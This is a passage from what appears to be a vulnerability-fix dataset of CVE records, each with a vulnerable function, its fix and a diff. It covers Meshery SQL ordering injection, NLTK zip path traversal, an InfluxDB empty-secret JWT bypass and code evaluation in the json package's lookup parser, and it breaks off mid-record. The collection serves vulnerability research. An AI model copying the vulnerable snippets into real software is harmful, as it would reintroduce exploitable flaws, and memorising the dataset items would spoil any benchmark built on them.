{\n\t\terr := json.Unmarshal([]byte(clusterIds), &filter.ClusterIds)\n\t\tif err != nil {\n\t\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tfilter.ClusterIds = []string{}\n\t}\n\n\tresult := provider.GetGenericPersister().Model(&model.KubernetesResource{}).Distinct(\"kind\").\n\t\tWhere(\"kubernetes_resources.cluster_id IN (?)\", filter.ClusterIds)\n\n\tif search != \"\" {\n\t\tresult = result.Where(\"kubernetes_resources.kind LIKE ?\", 
\"%\"+search+\"%\")\n\t}\n\n\tif limit != 0 {\n\t\tresult = result.Limit(limit)\n\t}\n\n\tif offset != 0 {\n\t\tresult = result.Offset(offset)\n\t}\n\n\torder = models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif order != \"\" {\n\t\tif sort == \"desc\" {\n\t\t\tresult = result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\t\t} else {\n\t\t\tresult = result.Order(order)\n\t\t}\n\t}\n\n\terr := result.Pluck(\"kinds\", &kinds).Error\n\tif err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tresponse := &models.MeshSyncResourcesKindsAPIResponse{\n\t\tKinds: kinds,\n\t\tTotalCount: totalCount,\n\t\tPage: page,\n\t\tPageSize: limit,\n\t}\n\n\tif err := enc.Encode(response); err != nil {\n\t\th.log.Error(ErrFetchMeshSyncResources(err))\n\t\thttp.Error(rw, ErrFetchMeshSyncResources(err).Error(), http.StatusInternalServerError)\n\t}\n}"}, {"id": "fix_go_278_3", "commit": "b55f6064d0c6a965aee38f30281f99da7dc4420c", "file_path": "server/models/events_persister.go", "start_line": 47, "end_line": 106, "snippet": "func (e *EventsPersister) GetAllEvents(eventsFilter *events.EventsFilter, userID uuid.UUID) (*EventsResponse, error) {\n\teventsDB := []*events.Event{}\n\tfinder := e.DB.Model(&events.Event{}).Where(\"user_id = ?\", userID)\n\n\tif len(eventsFilter.Category) != 0 {\n\t\tfinder = finder.Where(\"category IN ?\", eventsFilter.Category)\n\t}\n\n\tif len(eventsFilter.Action) != 0 {\n\t\tfinder = finder.Where(\"action IN ?\", eventsFilter.Action)\n\t}\n\n\tif len(eventsFilter.Severity) != 0 {\n\t\tfinder = finder.Where(\"severity IN ?\", eventsFilter.Severity)\n\t}\n\n\tif eventsFilter.Search != \"\" {\n\t\tfinder = finder.Where(\"description LIKE ?\", \"%\"+eventsFilter.Search+\"%\")\n\t}\n\n\tif eventsFilter.Status != \"\" {\n\t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n\t}\n\n\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n\tif eventsFilter.Order == \"asc\" {\n\t\tfinder = finder.Order(sortOn)\n\t} else {\n\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n\t}\n\n\tvar count int64\n\tfinder.Count(&count)\n\n\tif eventsFilter.Offset != 0 {\n\t\tfinder = finder.Offset(eventsFilter.Offset)\n\t}\n\n\tif eventsFilter.Limit != 0 {\n\t\tfinder = finder.Limit(eventsFilter.Limit)\n\t}\n\n\terr := finder.Scan(&eventsDB).Error\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcountBySeverity, err := e.getCountBySeverity(userID, eventsFilter.Status)\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &EventsResponse{\n\t\tEvents: eventsDB,\n\t\tPageSize: eventsFilter.Limit,\n\t\tTotalCount: count,\n\t\tCountBySeverityLevel: countBySeverity,\n\t}, nil\n}"}], "vul_patch": "--- a/mesheryctl/pkg/utils/helpers.go\n+++ b/mesheryctl/pkg/utils/helpers.go\n@@ -4,5 +4,8 @@\n \t\tclearCmd = exec.Command(\"cmd\", \"/c\", \"cls\") // for Windows\n \t}\n \tclearCmd.Stdout = os.Stdout\n-\t_ = clearCmd.Run()\n+\terr := clearCmd.Run()\n+\tif err != nil {\n+\t\tlog.Fatal(err)\n+\t}\n }\n\n--- a/server/handlers/meshsync_handler.go\n+++ b/server/handlers/meshsync_handler.go\n@@ -39,6 +39,7 @@\n \t\tresult = result.Offset(offset)\n \t}\n \n+\torder = models.SanitizeOrderInput(order, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif order != \"\" {\n \t\tif sort == \"desc\" {\n \t\t\tresult = 
result.Order(clause.OrderByColumn{Column: clause.Column{Name: order}, Desc: true})\n\n--- a/server/models/events_persister.go\n+++ b/server/models/events_persister.go\n@@ -22,10 +22,11 @@\n \t\tfinder = finder.Where(\"status = ?\", eventsFilter.Status)\n \t}\n \n+\tsortOn := SanitizeOrderInput(eventsFilter.SortOn, []string{\"created_at\", \"updated_at\", \"name\"})\n \tif eventsFilter.Order == \"asc\" {\n-\t\tfinder = finder.Order(eventsFilter.SortOn)\n+\t\tfinder = finder.Order(sortOn)\n \t} else {\n-\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: eventsFilter.SortOn}, Desc: true})\n+\t\tfinder = finder.Order(clause.OrderByColumn{Column: clause.Column{Name: sortOn}, Desc: true})\n \t}\n \n \tvar count int64\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-14751", "cve_description": "NLTK Downloader before 3.4.5 is vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in an NLTK package (ZIP archive) that is mishandled during extraction.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/nltk/nltk", "patch_url": ["https://github.com/nltk/nltk/commit/f59d7ed8df2e0e957f7f247fe218032abdbe9a10"], "programing_language": "Python", "vul_func": [{"id": "vul_py_98_1", "commit": "2554ff4", "file_path": "nltk/downloader.py", "start_line": "2249", "end_line": "2300", "snippet": "def _unzip_iter(filename, root, verbose=True):\n if verbose:\n sys.stdout.write('Unzipping %s' % os.path.split(filename)[1])\n sys.stdout.flush()\n\n try:\n zf = zipfile.ZipFile(filename)\n except zipfile.error as e:\n yield ErrorMessage(filename, 'Error with downloaded zip file')\n return\n except Exception as e:\n yield ErrorMessage(filename, e)\n return\n\n # Get lists of directories & files\n namelist = zf.namelist()\n dirlist = set()\n for x in namelist:\n if x.endswith('/'):\n dirlist.add(x)\n else:\n dirlist.add(x.rsplit('/', 1)[0] + '/')\n filelist = [x for x in namelist if not x.endswith('/')]\n\n # Create the target directory if it doesn't exist\n if not os.path.exists(root):\n os.mkdir(root)\n\n # Create the directory structure\n for dirname in sorted(dirlist):\n pieces = dirname[:-1].split('/')\n for i in range(len(pieces)):\n dirpath = os.path.join(root, *pieces[: i + 1])\n if not os.path.exists(dirpath):\n os.mkdir(dirpath)\n\n # Extract files.\n for i, filename in enumerate(filelist):\n filepath = os.path.join(root, *filename.split('/'))\n\n try:\n with open(filepath, 'wb') as dstfile, zf.open(filename) as srcfile:\n shutil.copyfileobj(srcfile, dstfile)\n except Exception as e:\n yield ErrorMessage(filename, e)\n return\n\n if verbose and (i * 10 / len(filelist) > (i - 1) * 10 / len(filelist)):\n sys.stdout.write('.')\n sys.stdout.flush()\n if verbose:\n print()"}], "fix_func": [{"id": "fix_py_98_1", "commit": "f59d7ed", "file_path": "nltk/downloader.py", "start_line": "2249", 
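The Meshery fix above neutralizes the ORDER BY injection by passing user-supplied sort columns through models.SanitizeOrderInput with an explicit allowlist before they reach gorm's Order clause. The record shows only the call sites, not the helper itself; the following Go sketch is one plausible shape for it (the name, signature, and allowlist are taken from the calls above, the body is an assumption):

```go
package models

// SanitizeOrderInput returns the candidate column only if it matches an
// allowlisted column name exactly; otherwise it returns "". Exact string
// comparison matters here because ORDER BY targets are identifiers, not
// values, and so cannot be protected by ordinary query parameter binding.
func SanitizeOrderInput(candidate string, allowed []string) string {
	for _, col := range allowed {
		if candidate == col {
			return col
		}
	}
	return ""
}
```

With such a guard in place, a crafted sort parameter like "(CASE WHEN ... THEN 1 END)" is reduced to the empty string and never reaches the SQL builder.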
"end_line": "2266", "snippet": "def _unzip_iter(filename, root, verbose=True):\n if verbose:\n sys.stdout.write('Unzipping %s' % os.path.split(filename)[1])\n sys.stdout.flush()\n\n try:\n zf = zipfile.ZipFile(filename)\n except zipfile.error as e:\n yield ErrorMessage(filename, 'Error with downloaded zip file')\n return\n except Exception as e:\n yield ErrorMessage(filename, e)\n return\n\n zf.extractall(root)\n\n if verbose:\n print()"}], "vul_patch": "--- a/nltk/downloader.py\n+++ b/nltk/downloader.py\n@@ -12,41 +12,7 @@\n yield ErrorMessage(filename, e)\n return\n \n- # Get lists of directories & files\n- namelist = zf.namelist()\n- dirlist = set()\n- for x in namelist:\n- if x.endswith('/'):\n- dirlist.add(x)\n- else:\n- dirlist.add(x.rsplit('/', 1)[0] + '/')\n- filelist = [x for x in namelist if not x.endswith('/')]\n+ zf.extractall(root)\n \n- # Create the target directory if it doesn't exist\n- if not os.path.exists(root):\n- os.mkdir(root)\n-\n- # Create the directory structure\n- for dirname in sorted(dirlist):\n- pieces = dirname[:-1].split('/')\n- for i in range(len(pieces)):\n- dirpath = os.path.join(root, *pieces[: i + 1])\n- if not os.path.exists(dirpath):\n- os.mkdir(dirpath)\n-\n- # Extract files.\n- for i, filename in enumerate(filelist):\n- filepath = os.path.join(root, *filename.split('/'))\n-\n- try:\n- with open(filepath, 'wb') as dstfile, zf.open(filename) as srcfile:\n- shutil.copyfileobj(srcfile, dstfile)\n- except Exception as e:\n- yield ErrorMessage(filename, e)\n- return\n-\n- if verbose and (i * 10 / len(filelist) > (i - 1) * 10 / len(filelist)):\n- sys.stdout.write('.')\n- sys.stdout.flush()\n if verbose:\n print()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-20933", "cve_description": "InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/influxdata/influxdb", "patch_url": ["https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_248_1", "commit": "93b56325fc2002513b17662c8d996327d2cb658d", "file_path": "services/httpd/handler.go", "start_line": 1551, "end_line": 1640, "snippet": "func authenticate(inner func(http.ResponseWriter, *http.Request, meta.User), h *Handler, requireAuthentication bool) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t// Return early if we are not authenticating\n\t\tif !requireAuthentication {\n\t\t\tinner(w, r, nil)\n\t\t\treturn\n\t\t}\n\t\tvar user meta.User\n\n\t\t// TODO corylanou: never allow this in the future without users\n\t\tif requireAuthentication && h.MetaClient.AdminUserExists() {\n\t\t\tcreds, err := parseCredentials(r)\n\t\t\tif err != nil {\n\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tswitch creds.Method {\n\t\t\tcase UserAuthentication:\n\t\t\t\tif creds.Username == \"\" {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"username required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tuser, err = 
h.MetaClient.Authenticate(creds.Username, creds.Password)\n\t\t\t\tif err != nil {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"authorization failed\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tcase BearerAuthentication:\n\t\t\t\tkeyLookupFn := func(token *jwt.Token) (interface{}, error) {\n\t\t\t\t\t// Check for expected signing method.\n\t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t\t\t\t}\n\t\t\t\t\treturn []byte(h.Config.SharedSecret), nil\n\t\t\t\t}\n\n\t\t\t\t// Parse and validate the token.\n\t\t\t\ttoken, err := jwt.Parse(creds.Token, keyLookupFn)\n\t\t\t\tif err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if !token.Valid {\n\t\t\t\t\th.httpError(w, \"invalid token\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tclaims, ok := token.Claims.(jwt.MapClaims)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"problem authenticating token\", http.StatusInternalServerError)\n\t\t\t\t\th.Logger.Info(\"Could not assert JWT token claims as jwt.MapClaims\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Make sure an expiration was set on the token.\n\t\t\t\tif exp, ok := claims[\"exp\"].(float64); !ok || exp <= 0.0 {\n\t\t\t\t\th.httpError(w, \"token expiration required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Get the username from the token.\n\t\t\t\tusername, ok := claims[\"username\"].(string)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"username in token must be a string\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if username == \"\" {\n\t\t\t\t\th.httpError(w, \"token must contain a username\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Lookup user in the metastore.\n\t\t\t\tif user, err = h.MetaClient.User(username); err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if user == nil {\n\t\t\t\t\th.httpError(w, meta.ErrUserNotFound.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\th.httpError(w, \"unsupported authentication\", http.StatusUnauthorized)\n\t\t\t}\n\n\t\t}\n\t\tinner(w, r, user)\n\t})\n}"}], "fix_func": [{"id": "fix_go_248_1", "commit": "761b557315ff9c1642cf3b0e5797cd3d983a24c0", "file_path": "services/httpd/handler.go", "start_line": 1551, "end_line": 1645, "snippet": "func authenticate(inner func(http.ResponseWriter, *http.Request, meta.User), h *Handler, requireAuthentication bool) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t// Return early if we are not authenticating\n\t\tif !requireAuthentication {\n\t\t\tinner(w, r, nil)\n\t\t\treturn\n\t\t}\n\t\tvar user meta.User\n\n\t\t// TODO corylanou: never allow this in the future without users\n\t\tif requireAuthentication && h.MetaClient.AdminUserExists() {\n\t\t\tcreds, err := parseCredentials(r)\n\t\t\tif err != nil {\n\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tswitch creds.Method {\n\t\t\tcase UserAuthentication:\n\t\t\t\tif creds.Username == \"\" {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"username required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tuser, err = 
h.MetaClient.Authenticate(creds.Username, creds.Password)\n\t\t\t\tif err != nil {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"authorization failed\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tcase BearerAuthentication:\n\t\t\t\tif h.Config.SharedSecret == \"\" {\n\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n\t\t\t\t\th.httpError(w, \"bearer auth disabled\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tkeyLookupFn := func(token *jwt.Token) (interface{}, error) {\n\t\t\t\t\t// Check for expected signing method.\n\t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t\t\t\t}\n\t\t\t\t\treturn []byte(h.Config.SharedSecret), nil\n\t\t\t\t}\n\n\t\t\t\t// Parse and validate the token.\n\t\t\t\ttoken, err := jwt.Parse(creds.Token, keyLookupFn)\n\t\t\t\tif err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if !token.Valid {\n\t\t\t\t\th.httpError(w, \"invalid token\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tclaims, ok := token.Claims.(jwt.MapClaims)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"problem authenticating token\", http.StatusInternalServerError)\n\t\t\t\t\th.Logger.Info(\"Could not assert JWT token claims as jwt.MapClaims\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Make sure an expiration was set on the token.\n\t\t\t\tif exp, ok := claims[\"exp\"].(float64); !ok || exp <= 0.0 {\n\t\t\t\t\th.httpError(w, \"token expiration required\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Get the username from the token.\n\t\t\t\tusername, ok := claims[\"username\"].(string)\n\t\t\t\tif !ok {\n\t\t\t\t\th.httpError(w, \"username in token must be a string\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if username == \"\" {\n\t\t\t\t\th.httpError(w, \"token must contain a username\", http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// Lookup user in the metastore.\n\t\t\t\tif user, err = h.MetaClient.User(username); err != nil {\n\t\t\t\t\th.httpError(w, err.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t} else if user == nil {\n\t\t\t\t\th.httpError(w, meta.ErrUserNotFound.Error(), http.StatusUnauthorized)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\th.httpError(w, \"unsupported authentication\", http.StatusUnauthorized)\n\t\t\t}\n\n\t\t}\n\t\tinner(w, r, user)\n\t})\n}"}], "vul_patch": "--- a/services/httpd/handler.go\n+++ b/services/httpd/handler.go\n@@ -31,6 +31,11 @@\n \t\t\t\t\treturn\n \t\t\t\t}\n \t\t\tcase BearerAuthentication:\n+\t\t\t\tif h.Config.SharedSecret == \"\" {\n+\t\t\t\t\tatomic.AddInt64(&h.stats.AuthenticationFailures, 1)\n+\t\t\t\t\th.httpError(w, \"bearer auth disabled\", http.StatusUnauthorized)\n+\t\t\t\t\treturn\n+\t\t\t\t}\n \t\t\t\tkeyLookupFn := func(token *jwt.Token) (interface{}, error) {\n \t\t\t\t\t// Check for expected signing method.\n \t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-7712", "cve_description": "This affects the package json before 10.0.0. 
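The InfluxDB patch above refuses bearer authentication whenever SharedSecret is unset. The guard is needed because HS256 verification against an empty key happily accepts tokens that were signed with that same empty key, so with no secret configured anyone can mint a token the server trusts. A standard-library-only Go sketch of such a forgery (the username and expiry claim values are made up for illustration):

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
)

func main() {
	b64 := base64.RawURLEncoding.EncodeToString
	// An HS256 JWT is base64url(header).base64url(claims), signed with
	// HMAC-SHA256(secret, signingInput).
	header := b64([]byte(`{"alg":"HS256","typ":"JWT"}`))
	claims := b64([]byte(`{"username":"admin","exp":4102444800}`))
	signingInput := header + "." + claims

	// With an empty shared secret, the "secret" is public knowledge.
	mac := hmac.New(sha256.New, []byte(""))
	mac.Write([]byte(signingInput))
	sig := b64(mac.Sum(nil))

	// A verifier keyed with the same empty secret accepts this token.
	fmt.Println(signingInput + "." + sig)
}
```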
It is possible to inject arbitrary commands using the parseLookup function.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/trentm/json", "patch_url": ["https://github.com/trentm/json/commit/cc4798169f9e0f181f8aa61905b88479badcd483"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_189_1", "commit": "8d3cf25", "file_path": "lib/json.js", "start_line": 764, "end_line": 883, "snippet": "function parseLookup(lookup, lookupDelim) {\n var debug = function () {};\n //var debug = console.warn;\n\n var bits = [];\n debug('\\n*** ' + lookup + ' ***');\n\n bits = [];\n lookupDelim = lookupDelim || '.';\n var bit = '';\n var states = [null];\n var escaped = false;\n var ch = null;\n for (var i = 0; i < lookup.length; ++i) {\n var escaped = (!escaped && ch === '\\\\');\n var ch = lookup[i];\n debug('-- i=' + i + ', ch=' + JSON.stringify(ch) + ' escaped=' +\n JSON.stringify(escaped));\n debug('states: ' + JSON.stringify(states));\n\n if (escaped) {\n bit += ch;\n continue;\n }\n\n switch (states[states.length - 1]) {\n case null:\n switch (ch) {\n case '\"':\n case '\\'':\n states.push(ch);\n bit += ch;\n break;\n case '[':\n states.push(ch);\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n bit += ch;\n break;\n case lookupDelim:\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n break;\n default:\n bit += ch;\n break;\n }\n break;\n\n case '[':\n bit += ch;\n switch (ch) {\n case '\"':\n case '\\'':\n case '[':\n states.push(ch);\n break;\n case ']':\n states.pop();\n if (states[states.length - 1] === null) {\n var evaled = vm.runInNewContext(\n '(' + bit.slice(1, -1) + ')', {}, '');\n bits.push(evaled);\n bit = ''\n }\n break;\n }\n break;\n\n case '\"':\n bit += ch;\n switch (ch) {\n case '\"':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n\n case '\\'':\n bit += ch;\n switch (ch) {\n case '\\'':\n states.pop();\n if (states[states.length - 1] === null) {\n bits.push(bit);\n bit = ''\n }\n break;\n }\n break;\n }\n debug('bit: ' + JSON.stringify(bit));\n debug('bits: ' + JSON.stringify(bits));\n }\n\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n\n // Negative-intify: strings that are negative ints we change to a Number for\n // special handling in `lookupDatum`: Python-style negative array indexing.\n var negIntPat = /^-\\d+$/;\n for (var i = 0; i < bits.length; i++) {\n if 
(negIntPat.test(bits[i])) {\n bits[i] = Number(bits[i]);\n }\n }\n\n debug(JSON.stringify(lookup) + ' -> ' + JSON.stringify(bits));\n return bits\n}"}, {"id": "vul_js_189_2", "commit": "8d3cf25", "file_path": "lib/json.js", "start_line": 1239, "end_line": 1379, "snippet": "function main(argv) {\n var opts;\n try {\n opts = parseArgv(argv);\n } catch (e) {\n warn('json: error: %s', e.message)\n return drainStdoutAndExit(1);\n }\n //warn(opts);\n if (opts.help) {\n printHelp();\n return;\n }\n if (opts.version) {\n if (opts.outputMode === OM_JSON) {\n var v = {\n version: getVersion(),\n author: 'Trent Mick',\n project: 'https://github.com/trentm/json'\n };\n console.log(JSON.stringify(v, null, opts.jsonIndent));\n } else {\n console.log('json ' + getVersion());\n console.log('written by Trent Mick');\n console.log('https://github.com/trentm/json');\n }\n return;\n }\n var lookupStrs = opts.args;\n\n // Prepare condition and execution funcs (and vm scripts) for -c/-e.\n var execVm = Boolean(process.env.JSON_EXEC &&\n process.env.JSON_EXEC === 'vm');\n var i;\n var condFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condFuncs[i] = funcWithReturnFromSnippet(opts.condSnippets[i]);\n }\n }\n var condScripts = [];\n if (execVm) {\n for (i = 0; i < opts.condSnippets.length; i++) {\n condScripts[i] = vm.createScript(opts.condSnippets[i]);\n }\n }\n var cond = Boolean(condFuncs.length + condScripts.length);\n var exeFuncs = [];\n if (!execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeFuncs[i] = new Function(opts.exeSnippets[i]);\n }\n }\n var exeScripts = [];\n if (execVm) {\n for (i = 0; i < opts.exeSnippets.length; i++) {\n exeScripts[i] = vm.createScript(opts.exeSnippets[i]);\n }\n }\n var exe = Boolean(exeFuncs.length + exeScripts.length);\n\n var lookups = lookupStrs.map(function (lookup) {\n return parseLookup(lookup, opts.lookupDelim);\n });\n\n if (opts.group && opts.array && opts.outputMode !== OM_JSON) {\n // streaming\n var chunker = chunkEmitter(opts);\n chunker.on('error', function (error) {\n warn('json: error: %s', err.message);\n return drainStdoutAndExit(1);\n });\n chunker.on('chunk', parseChunk);\n } else if (opts.inPlace) {\n assert.equal(opts.inputFiles.length, 1,\n 'cannot handle more than one file with -I');\n getInput(opts, function (err, content, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n\n // Take off a leading HTTP header if any and pass it through.\n var headers = [];\n while (true) {\n if (content.slice(0, 5) === 'HTTP/') {\n var index = content.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = content.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if (!opts.dropHeaders) {\n headers.push(content.slice(0, index + sepLen));\n }\n var is100Continue = (\n content.slice(0, 21) === 'HTTP/1.1 100 Continue');\n content = content.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(content, undefined, filename, true, headers.join(''));\n });\n } else {\n // not streaming\n getInput(opts, function (err, buffer, filename) {\n if (err) {\n warn('json: error: %s', err.message)\n return drainStdoutAndExit(1);\n }\n // Take off a leading HTTP header if any and pass it through.\n while (true) {\n if (buffer.slice(0, 5) === 'HTTP/') {\n var index = buffer.indexOf('\\r\\n\\r\\n');\n var sepLen = 4;\n if (index == -1) {\n index = buffer.indexOf('\\n\\n');\n sepLen = 2;\n }\n if (index != -1) {\n if 
(!opts.dropHeaders) {\n emit(buffer.slice(0, index + sepLen));\n }\n var is100Continue = (\n buffer.slice(0, 21) === 'HTTP/1.1 100 Continue');\n buffer = buffer.slice(index + sepLen);\n if (is100Continue) {\n continue;\n }\n }\n }\n break;\n }\n parseChunk(buffer, null, filename, false);\n });\n }"}], "fix_func": [{"id": "fix_js_189_1", "commit": "cc47981", "file_path": "lib/json.js", "start_line": 773, "end_line": 950, "snippet": "function parseLookup(lookup, lookupDelim) {\n var debug = function () {};\n // var debug = console.warn;\n\n var bits = [];\n debug('\\n*** ' + lookup + ' ***');\n\n bits = [];\n lookupDelim = lookupDelim || '.';\n var bit = '';\n var states = [null];\n var escaped = false;\n var ch = null;\n for (var i = 0; i < lookup.length; ++i) {\n var ch = lookup[i];\n debug('-- i=' + i + ', ch=' + JSON.stringify(ch) + ' escaped=' +\n JSON.stringify(escaped));\n debug('states: ' + JSON.stringify(states));\n\n // Handle a *limited subset* of JS string escapes.\n // JSSTYLED\n // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation\n var SUPPORTED_ESCAPES = {\n '\\'': '\\'',\n '\\\"': '\\\"',\n '\\`': '\\`',\n '\\\\': '\\\\',\n 'n': '\\n',\n 'r': '\\r',\n 't': '\\t',\n 'v': '\\v',\n 'b': '\\b',\n 'f': '\\f'\n };\n if (ch === '\\\\' && i+1 < lookup.length) {\n var nextCh = lookup[i+1];\n var escapedCh = SUPPORTED_ESCAPES[nextCh];\n if (escapedCh !== undefined) {\n debug('escaped: %j -> %j', ch+nextCh, escapedCh);\n bit += escapedCh;\n i++;\n continue;\n }\n }\n\n switch (states[states.length - 1]) {\n case null:\n switch (ch) {\n case '\"':\n case '\\'':\n states.push(ch);\n bit += ch;\n break;\n case '[':\n states.push(ch);\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n bit += ch;\n break;\n case lookupDelim:\n if (bit !== '') {\n bits.push(bit);\n bit = ''\n }\n break;\n default:\n bit += ch;\n break;\n }\n break;\n\n case '[':\n bit += ch;\n switch (ch) {\n case '\"':\n case '\\'':\n case '[':\n states.push(ch);\n break;\n case ']':\n states.pop();\n if (states[states.length - 1] === null) {\n // `bit` is a bracketed string, `[...]`.\n //\n // The *intent* is to allow specifying an object key\n // that would otherwise get interpreted by `json`s\n // LOOKUP parsing -- typically if 